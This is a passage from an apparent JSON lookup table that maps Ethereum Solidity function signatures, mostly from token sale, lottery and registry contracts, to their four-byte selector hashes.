"0x96fbab31", "changeZombieCreator(address)": "0x0213443c", "createZombie(uint8,bytes32,uint16,bool,address)": "0x7635e409", "seeZombieRole(uint256)": "0xeda0576b", "seeZombieStar(uint256)": "0x7df4732e", "seeZombieDna(uint256)": "0xb50a0899", "checkAllOwner(uint256[],address)": "0xea7cabdd", "DET()": "0xb05a0071", "books()": "0x5c8fe438", "confirmSetIssuer()": "0xe4495b15", "ABitcoin()": "0x4e7344d5", "BCCB()": "0x320665a6", "batchTransfer2(address[])": "0xca2527e5", "Elixer()": "0x8e414295", "HJHToken(uint256,uint256)": "0x39c79cfc", "airDrop()": "0xca5d0880", "resetDropAddress(address)": "0x215f865e", "resetAirDrop(uint256,uint256)": "0x25ca953d", "setItemOptions(address,uint256,uint256,uint8)": "0x2e81cdda", "setItemOption(address,uint256,uint256)": "0x9d5eab46", "itemTransfer(address)": "0x2ec19f0f", "itemBalance(address)": "0xaa8d715d", "MangGuoToken(string,string,uint8,uint256)": "0x7b1c6c83", "CrystiumToken()": "0x91bfeb98", "GetBonus()": "0xa66cb0ee", "CoinParkToken()": "0x96881d20", "SIMCOIN()": "0x973fcaef", "PropellerheadSupport()": "0xbe6896c3", "removeVerifiedAddress(address)": "0x4e6b558a", "addVerifiedAddress(address)": "0xf76aae2f", "isVerificator(address)": "0x320ea024", "removeVerificatorAddress(address)": "0x783e7a06", "addVerificatorAddress(address)": "0x09e2f193", "FinToken()": "0xecf12669", "MICL()": "0x5df93f99", "Testtoken(uint256,string,string)": "0xf0bfd737", "VVToken()": "0x2daddb32", "ETHERCOIN()": "0x5cf0769c", "disableBets()": "0xb60e00b9", "enableBets()": "0xadaa3c73", "disableEmergencyBlock()": "0x3c206900", "enableEmergencyBlock()": "0x5e2a725c", "changeRollUnder(uint256)": "0xcc7b41ec", "changeOneBet(uint256)": "0x03bc1e19", "changeExtraBets(uint256)": "0xef4f0c5f", "changeParticipants(uint256)": "0xea0d98aa", "returnBets()": "0xe0d751da", "distributeWinnings(uint256)": "0x4544c48c", "proxyGetRefund()": "0xcf6b1081", "wakeUpProxy()": "0xe8878b11", "getWaitingState()": "0x4e84c614", "getBetsBlock()": "0x417a767e", "getExtraBets()": "0xd977076e", "getOneBet()": "0x1a5e6f7d", "getRollUnder()": "0x12d96887", "getExpectedReturn()": "0x35c5b475", "getRolled()": "0x2dbf8bf0", "getBetsState()": "0xe4397db1", "setExpectedReturn(uint256)": "0xfdee4ff9", "setEtherollAddress(address)": "0x1c949bdf", "withdrawPendingTransactions()": "0x5d9adc94", "sendToEtheroll(uint256,uint256)": "0x923e1b84", "getEtherollAddress()": "0xee4de756", "getRoundID()": "0xc17f23e8", "EvoToken(address)": "0xe90ecfce", "ArtToujourICO(uint256,uint256,uint256,uint256,uint256,address)": "0x4d66d44d", "grantFounderTeamToken()": "0xff95a8d2", "grantAdvisorToken()": "0x288811cb", "bountyFunds(address[],uint256[])": "0x9a471416", "ArtToujourToken()": "0x0c72bf39", "unsoldToken()": "0x27608c24", "icoTokens(uint256,uint256,uint256)": "0x69cd5df1", "preICOTokens(uint256,uint256)": "0xf9dfecb9", "preSaleTokens(uint256,uint256)": "0x63f07aa4", "trancheMinTx()": "0x99d9b306", "BASE_DURATION()": "0x11997dc6", "rspScience()": "0xb2d138d2", "unfreeze_periods()": "0x838661eb", "isSecondStageTokensMinted()": "0x881fd690", "baseTokensAllocated()": "0xc4109d48", "_BLOCK_REWARD()": "0x5e4b587b", "INITIAL_TOKEN_FROM_COMPAIN()": "0xaf35314a", "drainFunds()": "0x733ef936", "numberOfPlayers()": "0x6f4bda17", "SendPreReserved1()": "0x331eac01", "sampleContract()": "0x65ff8220", "bonusThirdWeek()": "0x1e5fc8e7", "defaultDeadline()": "0x7b73c2ef", "strategicLockup()": "0xae0e8f3f", "minimumTokenCommission()": "0x0fc1c83d", "circulatingTokensFromSale()": "0xdf41765e", "offline()": "0x9fa2526f", "investorsNum()": "0x72b2ee75", "level_4_amount()": "0x5d37c840", "bountyTotalSupply()": "0xb86eeb69", "purchaseCounter()": "0x055680f0", "developeo()": "0xff4f03a9", "tokensForOwner()": "0xc0864877", "enableScheduler()": "0xbfea8790", "foundation_vesting_contract()": "0x288365a7", "SECOND_VOLUME_BONUS()": "0x0a8b88f6", "eventSaleEnd()": "0xabff3fc1", "preSaleBonus1Time()": "0x6bece548", "startCountDown()": "0x21d7bdff", "proofOfSms()": "0xfdae3b70", "LOCKED_TIME()": "0xd81dfe30", "frozenRecordsCount()": "0xec00d2a4", "trustedToken()": "0xe3386a98", "Answer()": "0x1be16003", "FOUNDER2()": "0xa804903a", "startingIndex()": "0xcb774d47", "goldSaleLimit()": "0x32846270", "addrDistribution()": "0x4899e4c6", "START_BLOCK_NUMBER()": "0xd8bf63b7", "amount50kUsdInCents()": "0x8eaa5d1c", "maxPublicSaleStage()": "0x222c1390", "hardCapPreSale()": "0xf7e4a4a9", "advisorsPeriodsNumber()": "0xebc97c36", "timeLimit()": "0xc08d1fe5", "CRLperEther()": "0xd8b98118", "totalNihilum()": "0x4251a7a4", "FOUNDERS_TOKENS_VESTED_1()": "0x97fdf5f2", "goldPercentage()": "0xd08e2354", "growthTokensPercent()": "0x63772f33", "FACTOR_9()": "0x1114811a", "ballotEncryptionPubkey()": "0x14534ba7", "teamTokensLock()": "0x916e5901", "getMax(uint128[])": "0x4fd394ba", "removeOwners2()": "0xc40580de", "OPERATION_AMOUNT()": "0x944ea477", "airdropWinTime()": "0xe57053cd", "FileNameInt()": "0x994fb25f", "currentIncreaseWithdrawalTeamBallot()": "0xea2f43c3", "transferUnlock()": "0xd09a6a62", "getCustomer()": "0x650d993b", "largeSize()": "0x5d337b01", "AllowTransferLocal()": "0xb814660e", "MIN_CROWSALE_TIME()": "0xb630230a", "icoCoinCap()": "0x058029a2", "partFees()": "0xd8aba1c6", "folioToken()": "0x25c24bc3", "tokensDispensed()": "0xe39fbd88", "submittedAmount()": "0x990e2979", "timestampRelease()": "0x20e25965", "_circulatingSupply()": "0xa253c06e", "WIDTH()": "0xd44d3394", "getCertificateIssued()": "0xfd1c66da", "gameEndPlayNo()": "0xaf8d98c9", "STAGE_ONE_TIME_END()": "0x6f259077", "maximumHodlDuration()": "0xd9244bf9", "DIVISOR_STAKE()": "0x3f423afe", "vars()": "0x0e5376d6", "tokensFor1EthP6()": "0x483699f4", "pollNonce()": "0x97508f36", "accRecive()": "0x7532ef1c", "lrcUnlockPerMonth()": "0xcf3e9519", "minRollUnder()": "0x310c0c1e", "addEarlyPurchases()": "0xfeb4ad89", "decimalOffset()": "0xd1b39ae5", "roundFunds()": "0x620d025c", "TOKENS_ALLOCATED_TO_PROOF()": "0x57f664ed", "soldTokenCount()": "0x9bdf6f62", "picopsCertifier()": "0x5f111074", "m_categoriesCreator()": "0xb6b8c3cd", "getWeekNo()": "0x8a5c19c0", "description4()": "0x612bfae2", "round2TokensRemaning()": "0x5e031606", "phase2MaxEtherCap()": "0x3aa49656", "final_share_price()": "0xa1c68880", "BUSINESS_DEVELOPMENT_SUPPLY_LIMIT()": "0x9515a524", "testEggIds()": "0xee5200a1", "fiatContract()": "0x41b2485b", "total_buy()": "0x4c26b6eb", "completeRemainingTokens()": "0xcf79d8b4", "updateAttribute(bytes32,bytes32)": "0xf9c5e0aa", "addAttribute(bytes32)": "0x89f0151c", "removeOverride()": "0x833ffb63", "sendEvent(uint256,bytes32)": "0x9d42d1a9", "SmartIdentity()": "0x4025005a", "Takafuly()": "0xac4758cc", "refundCfd(uint128)": "0x7193b1e4", "withdraw(uint128,address)": "0x1d9b0783", "settleCfd(uint128)": "0xbf85cc27", "settleAndWithdrawCfd(uint128)": "0x25476ed8", "takeCfd(uint128,address)": "0xe86bf267", "getCfd(uint128)": "0xc7a37657", "getAssetPrice(uint128,uint128)": "0xc289adfa", "recordAssetPrice(uint128,uint128,uint128)": "0x4b9ce83c", "Election()": "0x1d6c263c", "COINESIA()": "0x1082d51e", "addCourse(string,string,bytes32)": "0x25910753", "updateStudent(string,bytes32,string)": "0xc567cd26", "addStudent(string,bytes32,string)": "0x375a8131", "Certificate()": "0x4ef6b8ce", "onLEXpaContract()": "0x5b17b190", "addConfirmation(bytes32)": "0xe58d116b", "_collect_fee(address,address,uint256)": "0x70bf7b96", "Token(address[],uint256)": "0x3c09ee26", "AccountVoid(address)": "0x095e596f", "remainBalanced()": "0x831f5ad2", "transferFrom(address,address,uint256,bool,uint256)": "0xf61b9aed", "ConfirmDispose()": "0x1dfa0cf6", "numberOwners()": "0x76d1d35e", "MultiOwner(address[],uint256)": "0xdde37357", "ExTokeA()": "0xf7ffaa5b", "AlexTestCoin()": "0xb40bfd35", "pruebacn123()": "0x9a8f72d1", "QLALA()": "0xdcd3c2e5", "Auxilium()": "0xa94c33a6", "MassivelyMultiplayerOnlineGame()": "0x02eef7c3", "view_readyTime()": "0x080f27f3", "get_token()": "0xa4d4f070", "set_cooldown(uint256)": "0xd6798645", "set_address(address,address)": "0xc3615e39", "set_amount(uint256)": "0xab8425d8", "Super87Coin()": "0x32c442d6", "RADCOIN()": "0x8864d074", "TagadaTsoinTsoinCoin()": "0xc8f21d22", "sellToken(address,uint256)": "0xf464e7db", "updateTokenExchangeRatio(uint256)": "0xa099e6be", "SemfaxToken()": "0xcaefc5d5", "PonicsToken(string,string,uint8,uint256)": "0xada69935", "getScore()": "0xafd82067", "addScore(address,uint256)": "0xd119db4c", "setStore(string,address,address)": "0x34a3312e", "TweedentityRegistry()": "0x1c0183e3", "currentStatus()": "0xef8a9235", "confirmEjectment()": "0x3101ab7f", "confirmOccupancy()": "0x79eac7c3", "confirm()": "0x7022b58e", "setFee(uint32,address)": "0x4cceeccd", "createBooking(uint128,uint128,uint32,uint32,uint256,address)": "0x09e9c325", "g(uint256[20])": "0x8865015d", "change()": "0x2ee79ded", "nochange()": "0x1d42cf72", "getx()": "0xe276c799", "DSToken()": "0xe740ce26", "emergency(bool)": "0x53398119", "YeedToken(uint256)": "0x6328af59", "FETCOIN()": "0x9d3d9b4d", "hasSufficientPaymentInternal(address,uint256)": "0xbf385c00", "asyncTransfer(address,address,uint256)": "0xc7347832", "getBuyOrderInfo(address,address)": "0x78eca227", "getSellOrderInfo(address,address)": "0x530266c7", "isValidBuyOrder(address,address)": "0x6ed51d94", "isValidSellOrder(address,address)": "0x8f9abe52", "fillBuyOrder(address,address,uint256,uint256,uint256)": "0x55494d1e", "putBuyOrder(address,uint256,uint256,uint256)": "0x63fb5a1a", "fillSellOrder(address,address,uint256,uint256,uint256)": "0xbf5b6234", "putSellOrder(address,uint256,uint256,uint256)": "0x3c811ee0", "SputnikPresale(address)": "0x9fec4ac4", "GullitCoin()": "0x457a21bc", "EthertokenDelta(address,address,address,uint256,uint256,uint256)": "0x2fb260f6", "bid(uint8)": "0x33500e26", "StartAuction(string,uint256,uint256)": "0x519936db", "mintComplete(uint256,int256)": "0x946267ec", "mintApprove(uint256,int256)": "0x051a86cc", "mintRequest(address,uint256,uint256)": "0x57cb4947", "transfer(address,uint256,bytes,string,uint256)": "0xe389b63f", "changeCrown(address)": "0x724c8393", "setTreasurer(address)": "0x671d6429", "tokenFallback(address,uint256,bytes,string,uint256)": "0xb87dddf6", "GarudaToken()": "0x343c018b", "MoregainCoin(uint256,string,string)": "0xfa1152f3", "getDepositorsTokens()": "0x5c78f9e2", "LetsFunds()": "0x727a00a5", "GolfCoin()": "0x3738eb8a", "myPinerTokenTest1()": "0x5d99e02f", "KopihitamToken()": "0xcb930934", "EuroGoldTest(uint256)": "0xb5622abc", "availableBalanceInLockingPeriodForInvestor(address)": "0x955d1721", "allocateTokensToTeamAndProjects(address,uint256)": "0xb13413b0", "allocateTokensToInvestors(address,uint256)": "0xcd5777e2", "KPISToken()": "0xf4385eaf", "balanceOfNonKYC(address)": "0xc2b98295", "batchTransferPaidTokens(address[],uint256[])": "0x3f50331d", "Cilox()": "0x2b97c6e4", "sendDelayedTransactions()": "0xf26e787e", "reject(address,uint256,bytes,uint256)": "0xb6d6164a", "sendFundsInternal(uint256,address,bytes)": "0xa7374b21", "updateLastActivity()": "0xcee6b53c", "sendFunds(uint256,address,bytes)": "0xab03cf46", "isTokenAddressAlreadyInList(address)": "0xcd1dc527", "calculateAmounts(uint256)": "0xe1df507c", "_addTokenAddress(address)": "0x690f2f8e", "deleteTokenAddress(address)": "0x967506be", "addTokenAddress(address)": "0x51992fcb", "addTokenAddresses(address[])": "0xc3f07ba7", "isDestroyed()": "0xa6151a84", "Jupiter()": "0x9a6edad1", "RAMTOKEN()": "0x6ce4a9a8", "distributePrizes(uint256)": "0x6ca3fc3b", "generateNumberWinner()": "0x0a50e361", "getVoteNum(address)": "0x629f4028", "GT(uint256,string,string)": "0x09dc66af", "Paraboloid()": "0x7a72c32f", "NACToken(uint256,string,uint8,string)": "0x3bc756d0", "Increment()": "0x648b7ce8", "finalUnpause()": "0xc49ee5b4", "HIKEN(uint256,string,uint8,string)": "0x4408c38a", "AKBToken()": "0x1d12b52f", "UncleToken()": "0x730a9f1c", "getTop(uint256)": "0x37caa8b6", "changeRecvEthStatus(bool)": "0xdb2307b6", "balanceInWei()": "0xe2d56060", "setEthPlan(address,uint256,uint256,bool)": "0x38a52fb1", "delAdminUsrs(address)": "0x75a6dbda", "addAdminOwners(address,string,string)": "0x76d865dd", "sign(uint256,address,uint256)": "0x644a9db8", "disableTransferAgreement(uint256)": "0xeece203a", "createTransferAgreement(uint256,uint256,address)": "0xca5454db", "TransferEthToAddr(address,uint256)": "0xf9c1a197", "setTransferPlan(address,uint256,bool)": "0x2dab3e7a", "changeContractName(string,string)": "0x38d67d88", "moduleToken(uint256,uint8)": "0x4e0ce969", "NatureSeedToken()": "0x7b1bd162", "Voodka()": "0xca169e66", "__getbalance()": "0x97a989c2", "devidendsOf(address)": "0x50e08ddb", "getDevidends()": "0xefa25196", "holdersWithdrowsOf(address)": "0xbfe53e5c", "NzmLToken()": "0x48fc66e9", "Cyncrohnis()": "0x636760a2", "ABToken(uint256,string,uint8,string)": "0xcaa7b4b8", "TokenERC20_test(uint256,string,string)": "0x06eb0c2f", "Oogroll()": "0x316b8cab", "Mountain()": "0x01bea2bd", "AutoMOBILEtoken()": "0xa56f2d5f", "FCOIN1448Token(uint256,string,string,uint256)": "0x75121c2c", "DrazenToken()": "0xea00cdb2", "economy()": "0x8820f6bd", "HongToken(uint256,string,uint8,string)": "0x6bfbc9f7", "StrongHoldTEST()": "0x3f056d2a", "Popcore(uint256,string,uint8,string)": "0x756bf6e9", "cancelPending(bytes32)": "0x893372ca", "checkHowManyOwners(uint256)": "0xb464d582", "JYKToken()": "0xbfe3c39d", "PrincelyGoldenDollar()": "0xed3a2164", "FCOIN1122Token(uint256,string,string,uint256)": "0xb12ed9ef", "myxTest()": "0x768a3326", "DogeCoin()": "0x52d08730", "parentKidsLink(uint256,string,string)": "0x6b946680", "payWinners()": "0x5337448e", "announce(uint256,uint256,uint256)": "0x7ea1a871", "getBetsOnTimestamp(uint256)": "0x054c3c71", "payLeaderAndDev()": "0xca84d17d", "bet(uint256[],address)": "0x5cd48caa", "sendPrizes()": "0xa3318359", "OMIVIAToken()": "0x61f00da2", "HRHToken(uint256,string,uint8,string)": "0x51d53bee", "TOKENO()": "0x3713513a", "releaseTime(uint256)": "0x09c4bb2b", "XCOIN()": "0x4705b55b", "_isNeededNewLottery()": "0xcecd9dd4", "_getWinner()": "0x8a35f788", "_getValuePartByPercent(uint256,uint256)": "0xe2912367", "_getTokenCountToBuyFromSeller(uint256)": "0xc6d44ecc", "_getNewLotteryCreatedAt()": "0x4a955659", "_getCurrentTokenPrice()": "0xcc1d1e18", "_createNewLottery()": "0x460885ab", "_buyTokensFromSystem(uint256)": "0x677b1f0d", "_buyTokensFromSeller(uint256)": "0x9031bd2f", "_addToParticipants(address)": "0xdc414448", "withdrawForWinner(uint256)": "0xc2d37428", "updateParams(uint256,uint256,uint256,uint256,uint256,uint256)": "0x19b36162", "tokensToSellOnce()": "0xcc151c82", "isTokenSelling(uint256)": "0x3c027d4f", "getLotteryAtIndex(uint256)": "0x5a531015", "disapproveToSell(uint256)": "0x404ef602", "balanceSellingOf(address)": "0x0b3532b3", "approveToSell(uint256)": "0xb58637e8", "buyAutos(uint256)": "0x6c14bb42", "SellFinishedAutos()": "0x700215d0", "setMaxSet(uint256)": "0x5470f6db", "isERC20()": "0x2eb67f53", "refundAllowed()": "0x3fa911ae", "MIN_DEPOSIT()": "0xe1e158a5", "token2GT()": "0x5945bdc5", "minimumFeePercentage()": "0xa971c23d", "setRateAddress()": "0xb4d14728", "grantedTokensHardCap()": "0x42fba0f5", "OfficialWalletAddr()": "0xc54f5344", "withdrawSum()": "0xe0acac7f", "coinsaleactive()": "0x07ba216c", "firstSaleComplete()": "0x4d0217b7", "gracePeriodAmount()": "0xcf509b9d", "launch_date()": "0xab464a4c", "votingAllowed()": "0x17e760bb", "refundLoan()": "0xdd967b0b", "LimitEther()": "0x4f5fca97", "END_ADDRESS()": "0x9ebe13a2", "teamKeepingQuota()": "0x9e29559c", "gvOptionToken20()": "0x779e5ad8", "saleCap()": "0x078fd9ea", "instanceId()": "0x04fad28d", "startNumber()": "0x9fc7a200", "toVault()": "0xf9a329a6", "nPayments()": "0x3baf35fb", "giveawayReserve()": "0x538a8c21", "overallTakenEther()": "0xdc4ee13f", "bonusLimit4()": "0x38b9d61e", "isCanceled()": "0x0ed5a933", "totalBonuses()": "0xf9bacc1c", "totalSupplySale2()": "0xf0b24181", "banker()": "0x0ab9db5b", "brokerFee()": "0x628e50b5", "amount5()": "0x53ef5e03", "endStage2()": "0x520543ab", "icoEndUnix()": "0xb90f1af1", "pricePerTokenAtCurrentTier()": "0x342d9185", "unhalt_15day()": "0xe7d4761b", "IcoCloseTime()": "0x95a2d14b", "balDailyLotto()": "0xc14a2455", "lastDepositor()": "0xfd9f6856", "divisible_units()": "0x5f623e15", "getSaleLength()": "0xe5926ddc", "tokensBurned()": "0xe7873b58", "allWagered()": "0x4beb536e", "crowdsaleInProgress()": "0xe5a5fbc8", "totalHashRate()": "0xda3b6b35", "USD_CENT_PER_GZE()": "0x54a8ed7b", "threshold2()": "0x49051c1d", "PARSECS_TOTAL_AMOUNT()": "0x295d4756", "charityVault()": "0x02b09ac5", "buyer()": "0x7150d8ae", "lastBlock_f4()": "0xe9b62f13", "bonusFirstIco()": "0xd1bd328b", "protectedSupply()": "0x040425d1", "stopConvertTokens()": "0x791cbc4f", "borrowerReturnFiatPerEthRate()": "0xd9c682a7", "CrowdsaleState()": "0x46afb963", "partnerBonusPercent()": "0xfce14069", "preSaleCSSC()": "0xa2e3750c", "TYPE_EXPLORER_FREIGHTER()": "0x7ed5a6d4", "sweepMsg()": "0xde5007ff", "disableWhiteListForever()": "0xe390e263", "getRecipient()": "0x1b88094d", "PLATINUM_AMOUNT_TPT()": "0xc478b52f", "payStyle()": "0x06b2be05", "thirdLevelPrice()": "0x79c3dd32", "isDaySecond()": "0xc620b5fe", "privateSaleAddress()": "0xb1ba6ad7", "FAIL_FLAG()": "0x66a39350", "frozenAnnually()": "0x360c97dd", "ICOstart()": "0xefeb941d", "contract_finish()": "0x9afebd18", "durationSecondsIco()": "0x1b04a435", "BitcoinSamaritanSupply()": "0x0994257a", "validateraffle()": "0x95e16e97", "OWNER()": "0x117803e3", "gooDepositDivPercent()": "0x4a617fba", "lastReparation()": "0x94181d27", "currentSaleCap()": "0x4eb21301", "sumICOStage8USD()": "0x40f5c954", "tokensCounter()": "0x2891da02", "twoWeeks()": "0xae0b7bdb", "MAX_RING_SIZE()": "0xa37641ff", "balanceOfPot()": "0x899e0fc9", "vcxWallet()": "0x0c9daf45", "REAPER_INTREPID_MAX_CARGO()": "0x4cbfbf47", "presaleBalancesLocked()": "0x1a53cd90", "earlySuccessBlock()": "0x53490c67", "tier1Total()": "0xeba56302", "stopPrivatePlacement()": "0xba452930", "isOracleProxy()": "0x445a7a23", "totalAvailableGames()": "0x0fff6e06", "lastCreditorPayedOut()": "0x09f32957", "presaleLevel()": "0x2daf0e1c", "DGBLY()": "0xf5836761", "bonusEnd()": "0x8bc85b03", "totalPool()": "0xecfb49a3", "dayIdx()": "0x01edb1ea", "N()": "0xc9e525df", "minMintingPower()": "0x5d444ffb", "getCustomBuyerForIndex(address,uint256)": "0x58c6bce8", "setCustomBuyerLimit(address,address,uint256)": "0x4989b0b6", "getCustomBuyerLimit(address,address)": "0xddf9d613", "setAllowance(address,address,address,uint256)": "0xa7070373", "getAllowance(address,address,address)": "0xe7092b41", "setFoundation(address,address)": "0x05bf779f", "getFoundation(address)": "0x96468249", "setBalanceLimit(address,uint256)": "0xdbafdbb6", "getBalanceLimit(address)": "0xec7c637d", "setCirculationCap(address,uint256)": "0xcd54c54e", "getCirculationCap(address)": "0xb5802ae6", "setBuyPrice(address,uint256)": "0x1112b124", "getBuyPrice(address)": "0xcedc7277", "setTokenSymbol(address,bytes32)": "0xe6e623d5", "getTokenSymbol(address)": "0x81a73ad5", "setTokenName(address,bytes32)": "0x9c473bb2", "getTokenName(address)": "0x6f0fccab", "debitAccount(address,uint256)": "0x4cfe3e7f", "creditAccount(address,uint256)": "0x5b7d9043", "totalInCirculation()": "0x5cb0c16f", "BHK()": "0x999122f4", "MDOSToken(address,address)": "0x7e06ec93", "chinainc()": "0x0a986540", "FlowingHair()": "0xff213498", "combinedGoalReached()": "0x10cad61f", "removeFromPresaleWhitelist(address)": "0x01f7e49a", "addManyToPresaleWhitelist(address[])": "0x41f4ab98", "addToPresaleWhitelist(address)": "0x97f22ea9", "_getCrowdsaleTokenAmount(uint256)": "0x7b9fa595", "getCrowdsaleUserCap()": "0xf43abdf3", "ETUToken()": "0x5f1e580d", "Millionaire()": "0x61c7eb81", "DiscCoin()": "0xfd6efe80", "Criptolira()": "0x5caff1a7", "OnlineCasinoCoin()": "0xd4a61d61", "NHSToken()": "0xf3214652", "BixcPro(uint256,string,uint8,string)": "0x4294cdb2", "TRY_Omnidollar()": "0xe643197b", "bytes32ToAlphabetString(bytes32)": "0xa407ee79", "hash(address)": "0x7e809973", "getReferralRates()": "0x1f3a98d1", "referralCodeFromAddress(address)": "0xe126eb7d", "doesReferralCodeValid(string)": "0x0a394245", "participate(string)": "0x1d27769f", "Etherich()": "0xb291820b", "incrementpostId()": "0x041dad49", "getDatePosted(uint256)": "0xe1621b04", "getLinkToPostId(string)": "0xaa510c8c", "getPostVoteCount(uint256)": "0x4db9bfe6", "getPostPoster(uint256)": "0x3cfc47ea", "getPostLink(uint256)": "0xc9b7ab8b", "downdoot(uint256)": "0x09366ed2", "updoot(uint256)": "0x5b477c53", "createPost(string)": "0xc7303c61", "MYSTERYCLASSICCOIN()": "0x67bc480e", "xEURCoin()": "0xa5622c94", "isWhitelistedPresale(address)": "0x4d298265", "preSaleBonus(uint256)": "0x063dda8b", "validPurchasePresale()": "0x0b1a94e7", "buyTokensPresale(address)": "0xbf539711", "unwhitelistAddressPresale(address)": "0xd82ed7eb", "whitelistAddressPresale(address,uint256)": "0xc0e06ca3", "unwhitelistAddress(address)": "0x9d2a8cf0", "donateToken(address)": "0x85a2f6af", "_buy(uint8,bytes6,uint32,uint32)": "0x0a9d4e95", "_sell(uint8,bytes6,uint32,uint32)": "0xa6d93a9a", "_removeHolding(bytes12)": "0x554644d5", "_addHolding(bytes12)": "0x37f531ea", "addMarket(bytes6)": "0x388f58cd", "recoverStockKey(bytes12)": "0xd2df9222", "getStockKey(bytes6,bytes6)": "0x45aeff61", "getHolding(uint256)": "0x95bb9fcf", "getHoldingsCount()": "0x786d02d0", "getPositionFromHolding(uint256)": "0x172ab60c", "getPosition(bytes12)": "0x64e749ff", "getProfits(bytes6)": "0x28261850", "getMarket(uint256)": "0xeb44fdd3", "bulkSell(uint8[],bytes6[],uint32[],uint32[])": "0xc76b838c", "sell(uint8,bytes6,uint32,uint32)": "0xca2392f8", "reverseSplit(uint8,bytes6,uint8,uint32)": "0x008a3ca1", "split(uint8,bytes6,uint8)": "0xb65f90e3", "bulkBuy(uint8[],bytes6[],uint32[],uint32[])": "0x603e3a40", "buy(uint8,bytes6,uint32,uint32)": "0x3c6dfba1", "setTitle(string)": "0x72910be0", "setAddress(string)": "0x0599c284", "setTwitter(string)": "0xc2a5e5c2", "getTwitter()": "0xf175e6a9", "setGitHub(string)": "0xe98a0de7", "getGitHub()": "0x60434dcf", "setLinkedIn(string)": "0xfba0ce5e", "getLinkedIn()": "0x87f9534b", "popLanguage()": "0xa1b235af", "addLanguage(string)": "0x90a3d87e", "getLanguage()": "0xa8f927e9", "popEducation()": "0x3f2cb5d4", "addEducation(string)": "0x2cd53cfe", "getEducation()": "0x1c41e2db", "popExperience()": "0xedac3cb3", "addExperience(string)": "0x77a7354d", "getExperience()": "0xcdb986cc", "getOwnTokens()": "0xd00a9058", "generateTokenWithAttributes(string,string,string)": "0x6909f5bf", "generateToken()": "0xac1c3d04", "jasontestToken()": "0xf4cee3b5", "payCommission(address,uint256,uint256)": "0x0a52d194", "allTokenIds()": "0xe7619fad", "auctionsContract()": "0xe8ca3bbb", "releaseNow(uint256,uint256,uint8[],uint256,uint256,uint256,string,string)": "0x7984932e", "release(uint256,uint256,uint256,uint8[],uint256,uint256,uint256,string,string)": "0x38284f36", "collectionCountsOf(address)": "0x9d5c7be8", "collectionOf(address)": "0x3e94c904", "sendAsGift(address,uint256)": "0xc7046117", "createPainting(uint256)": "0xfe5709cd", "auctionsOf(address)": "0xc824a222", "market()": "0x80f55605", "createReleaseAuction(uint256,uint256,uint256,uint256,uint256)": "0xf2653966", "purchaseGen0Token(uint256)": "0xf74034df", "BagpackicoToken()": "0xeaa61e91", "MatContract()": "0x7b75a302", "addZethrAddress(address)": "0x885b6cfb", "inPreSalePeriod()": "0x4aed8a76", "CarnageToken()": "0x995771b9", "removeIdentifier(bytes32)": "0x5244d9a8", "setIdentifier(bytes32)": "0x00c99206", "validateFunction(bytes4)": "0x06463556", "QiMingCoinToken(uint256,string,uint8,string)": "0x48447983", "mytest()": "0x76e55338", "Chende()": "0x7feb4685", "STCC()": "0x2b5187fd", "LOL3()": "0xdd6996a3", "refund(uint256,address,address)": "0x96e83a40", "addPurchased(address,address,uint256,uint256)": "0xadf4fa09", "getMs(uint256)": "0x529dbdb5", "BitFwdToken()": "0x6970f46b", "HarryCoin()": "0x2866bae1", "AdameToken()": "0xa5181756", "UoBAMZNToken()": "0xf03b8bf5", "XeToken()": "0x6d01d12b", "validateHarCap(uint256)": "0xb6c3987d", "validCrowdsale()": "0xbe162060", "testVali(address,uint256)": "0xda8f54d8", "testAmount(uint256)": "0x142dc95d", "BobsNVag()": "0xc52adfda", "TSTEST1()": "0x89568a13", "Crowdsale(uint256,uint256,string,string)": "0x9e5b53bb", "whitelistMaxTok(address)": "0x43d018a0", "getPurchaseInfo(uint256,uint256,uint256,bool,uint256,uint256)": "0xe7b70b38", "getCurrentRate(uint256,uint256,uint256,uint256)": "0xbc4a2030", "PURCHASE(bytes32,uint256)": "0xe593428f", "NebbexToken(uint256,address)": "0x3d91eec0", "TweedentityClaimer()": "0x3bcdbd22", "NounToken()": "0x21fc2cd1", "StakeIt()": "0xd8c1fad1", "enroll()": "0xe65f2a7e", "FootScoutCrowdsale()": "0xd781f3f4", "_SetEducationQualificationOf(uint256)": "0x7eb13d8a", "getUserBio(string)": "0xaceb87e1", "getUserCollegeEducationDetails(string)": "0x6871819b", "getUserHSCeducationDetails(string)": "0x80249468", "getUserSSCeducationDetails(string)": "0xbceeb243", "getUserCertificationDetails(string)": "0xd5cfad68", "updateUserCertification(string,string,string,string,uint16)": "0x63ae2bae", "updateUserEducation(string,uint256,string,uint16)": "0xfef5b185", "updateUserBio(string,string)": "0xd5144eca", "UpdateUserEmail(string)": "0x86260cfe", "spreadGold(address,uint256)": "0x9280b836", "ThreeDJSToken(uint256)": "0x53994d51", "configurationCrowdsale(address,uint256,uint256,address,uint256[],uint256,uint256,uint8)": "0x4259b52e", "getOrgByIndex(string,uint256)": "0x8807a468", "sendToken(address[])": "0xcf5b90f0", "getOrgCount(string)": "0xa8d10fb8", "ETokenAirdrop()": "0x11563b04", "getDocByIndex(string,uint256)": "0x16a92f39", "getDocsCount(string)": "0x56330403", "getDoc(string,string)": "0xc68f2ada", "getOrg(string)": "0x696f541c", "addDoc(string,string,string,string)": "0xe8b3ed65", "approveRejectOrg(string,string,string,string,string)": "0x1470fc6f", "addOrg(string,string,string,string,string,string)": "0x64c7b78c", "isPartOfOrg(string)": "0x9e3f1f71", "transferERC721(address,string)": "0xc3ba2368", "record(string,string)": "0x470bb62b", "BEToken()": "0x8b7314e3", "changeBalanceReplenishmentStorage(address)": "0x16962849", "BaseAccountService(address,address)": "0x3e68dea3", "addBalanceReplenishment(uint256,uint256,uint16,bytes32,uint256)": "0x9b5d7d0b", "updatetoken(string,string,string,string)": "0x4dc996d5", "createtoken(string,string,string,string)": "0x3c7c2563", "tokenMetadata(string)": "0xb1e1ff3a", "takeOwnership(string)": "0x8945b1fc", "idOf(uint256)": "0xdee9f53f", "EthereumWings()": "0x43db24ad", "userClaims(address)": "0xf0a3563c", "userBuys(address)": "0x48d2df48", "dailyTotals()": "0x83c56fc8", "WalamaCoin()": "0xc70cef3a", "NextToken(address)": "0xe35c96d4", "bigbrother()": "0xeb935e70", "dollarToLoveyRate()": "0x55951e15", "ethToLoveyRate()": "0x2e97c5a5", "_claimReward20(address,string)": "0xcd1fdc14", "claimReward(address,string)": "0x3e6a569a", "updateMeta(uint256,uint256,string)": "0xb0c8d2dc", "isOpening()": "0x766d5235", "GorToken()": "0x39cc8a8e", "isStored()": "0xee460c64", "getPhoto(uint256)": "0xb6be128a", "storePhoto(string)": 